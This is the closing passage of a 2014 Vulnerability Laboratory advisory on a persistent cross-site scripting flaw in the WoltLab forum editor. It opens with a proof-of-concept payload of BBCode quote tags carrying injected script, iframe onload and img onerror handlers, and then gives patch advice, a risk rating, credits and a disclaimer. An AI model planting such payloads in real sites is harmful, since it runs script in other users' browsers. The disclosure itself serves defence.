</div>
<div class="formField">
<textarea name="text" id="text" rows="15" cols="40"
tabindex="9">[quote='Ateeq Ur Rehman
Khan',index.php?page=Thread&postID=23#post23]\'">
">[img]x[/img][size=10][align=center]
[/align][/size][/align][/size][size=10][align=center][align=center]\'"><sCrIpt><iframe%20src=x%20onload=confirm
(2)></iframe>>TEST<h1>TESTing</h1></sCrIpT>[/align]
"><img onerror=prompt(/POC/) src=x></img>
">[/align][/size][/align][/size][size=10][align=center]"
wcf_src="\'">[/align][/size][size=10][align=center]
Reference(s):
http://localhost:8080/forum/index.php?form=PostAdd&postID=23&action=quote
http://localhost:8080/forum/index.php?form=ThreadAdd&boardID=23
Picture(s):
../1.png
../2.png
../3.png
../4.png
../5.png
../6.png
../7.png
../8.png
../9.png
../10.png
Resource(s):
../Reply - direct execute test 1 - TalkBox #337
- VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM.htm
../Edit post - test 1 - TalkBox #337 -
VULNERABILITY LABORATORY - SECURITY RESEARCH FORUM.htm
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse of the
`mce_editor_0_codeview` module context on reverse requests through quote-,
multiquote- or edit- post.
An Upgrade of v3.9.1 pl1 to v4.x can solve the editor issues fully. Update also
the com.woltlab.wcf.form.message.wysiwyg editor core components to prevent the
issue.
The version 4.x is not affected by the vulnerability and has already upgraded
components which prevent an execution of script codes in the editor.
Security Risk:
==============
The security risk of the persistent validation vulnerability and encoding
filter issue in the editor is estimated medium.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@xxxxxxxxxxxxxxxxx)
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and
capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential
or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor
licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx -
research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com
- magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is
granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All
pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@xxxxxxxxxxxxxxxxxxxxx or
research@xxxxxxxxxxxxxxxxxxxxx) to get a permission.
Copyright © 2014 | Vulnerability Laboratory
[Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx